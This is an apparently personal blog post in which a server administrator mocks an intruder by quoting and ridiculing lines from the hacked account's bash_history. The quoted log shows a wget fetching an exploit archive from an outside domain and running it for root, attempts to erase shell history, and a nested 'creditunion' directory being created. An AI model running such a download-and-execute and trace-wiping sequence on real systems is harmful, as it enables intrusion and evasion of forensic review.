Hacked by a fool

After everything is in OK state finally, I want to post some things about this fool who hacked my server.
The bash_history of the hacked user shows me, that this guy really had no idea of what to do, a typical script kiddie using someone else's work for his evil purposes...

I want to post some snippets out of the bash_history file and comment them just for your amusement :)

wget wget great-shopper-sony.com/asul/expl.tgz
tar -xvzf expl.tgz
cd su
chmod +x x
chmod +x y
./x
./y
id
su root

If it was that easy to become root...

tar -xvzf hu.tar

Well, .tar seems definetly to be gzipped...

pico /etc/apache-ssl/httpd.conf

l33t hackers use pico, because their intellect is insufficient to use a real editor.

cat httpd.conf.old | grep luck

A very beautiful example of an UUOC (useless use of cat).

cd .secure
rm -rf bash_history

Yes, that worked flawlessly. I'm not able to see the history anymore, bummer.

mc

mc, nice. Using midnight commander definetly identifies you as the best hacker all around. The next time you're coming around I'll try to get you a linux compatible version of explorer.exe.

unset HISTFILES

Great, now the history is really cleared, isn't it?

dir

What is this, MS-DOS??

mkdir secure
cd secure/
mkdir creditunion
cd creditunion/
mkdir update
cd update/
mkdir user
cd user/

There's no way doing this more unergonomically. Dear l33t hacker, if you read this, try 'man mkdir' and have a look at the -p option.

pwd
pwd
pwd

Phew, thanks god he didn't issue 'pwd' a two times more, this would have launched the self destruct mechanism!
On the otherhand, who really knows if the directory doesn't change silently when using 'pwd', hm?

bye

Bye, bye, bummer.